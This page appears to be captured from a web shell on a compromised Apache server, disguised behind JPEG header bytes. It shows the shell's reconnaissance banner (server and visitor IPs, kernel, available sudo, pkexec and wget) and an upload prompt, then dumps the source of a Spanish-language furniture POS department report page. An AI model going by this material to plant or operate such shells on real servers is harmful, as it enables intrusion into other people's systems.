����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����
Server IP : 74.208.127.88 / Your IP : 216.73.216.22 Web Server : Apache/2.4.41 (Ubuntu) System : Linux ubuntu 5.4.0-163-generic #180-Ubuntu SMP Tue Sep 5 13:21:23 UTC 2023 x86_64 User : www-data ( 33) PHP Version : 7.4.3-4ubuntu2.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /var/www/html/muebles/application/category/ |
Upload File : |
<?php $titlepage="Departamentos"; $idsmenu=4; include "../../library/config.php"; require_once("../model/dbconn.php"); require_once("../model/pos.php"); require_once("../model/sql.php"); include "../layout/top-header.php"; include "../../library/check_login.php"; include "../../library/check_access.php"; ?> <link rel="stylesheet" href="../../dist/css/bootstrap-switch.min.css"> <link rel="stylesheet" href="../../plugins/datepicker/datepicker3.css"> <!-- Main content --> <section class="content"> <!-- Default box --> <div class="box"> <!-- Content Header (Page header) --> <section class="content-header"> <h1> Reporte de Departamentos dados de Baja <small>visita <a href="https://yusasoft1.com/">Sistemas Yusa</a> Mas Informacion</small> </h1> </section> <div class="box-body"> <!-- main navigation bar disini --> <div class="collapse navbar-collapse pull-left" id="navbar-collapse"> <ul class="nav navbar-nav"> <li><a href="<?php echo $sitename.'application/category/v_category1.php'; ?>" ><i class="fa fa-users"> Reporte Departamentos Activos</i></a></li> <li style="background:orange;"><a href="#" id="reporte"><i class="fa fa-users"> Reporte Departamentos Dados de baja</i></a></li> <li> <a href="<?php echo $sitename.'application/category/menu.php'; ?>" title="salir " >Regresar</i></a> </li> </ul> </div> <div class="row"> </div> <div class="table-responsive margin"> <table id="table-customer" class="table table-bordered"> <thead> <tr> <th style="width: 50px">id</th> <th style="width: 150px">Nombre</th> </tr> </thead> </table> </div> </div> <!-- /.box-body --> </div> <!-- /.box --> </section> <!-- /.content --> <?php include "../layout/footer.php"; //footer template ?> <?php include "../layout/bottom-footer.php"; //footer template ?> <script src="../../plugins/datepicker/bootstrap-datepicker.js"></script> <script src="../../dist/js/redirect.js"></script> <script type="text/javascript"> $(document).ready(function(){ data_init1(); }); function data_init1() { var value = { method : "list_category2" }; $('#table-customer').DataTable({ "language": { "decimal": "", "emptyTable": "No hay información", "info": "Mostrando _START_ a _END_ de _TOTAL_ Entradas", "infoEmpty": "Mostrando 0 to 0 of 0 Entradas", "infoFiltered": "(Filtrado de _MAX_ total entradas)", "infoPostFix": "", "thousands": ",", "lengthMenu": "Mostrar _MENU_ Entradas", "loadingRecords": "Cargando...", "processing": "Procesando...", "search": "Buscar:", "zeroRecords": "Sin resultados encontrados", "paginate": { "first": "Primero", "last": "Ultimo", "next": "Siguiente", "previous": "Anterior" } }, "paging": true, "lengthChange": false, "searching": true, "ordering": true, "info": false, "responsive": true, "autoWidth": false, "pageLength": 50, "dom": '<"top"f>rtip', "ajax": { "url": "category.php", "type": "POST", "data":value, }, "columns": [ { "data": "id" }, { "data": "name" }, ] }); $("#table-customer_filter").addClass("pull-right"); } $("#reporte").click(function(){ data_init(); }); </script> </body> </html>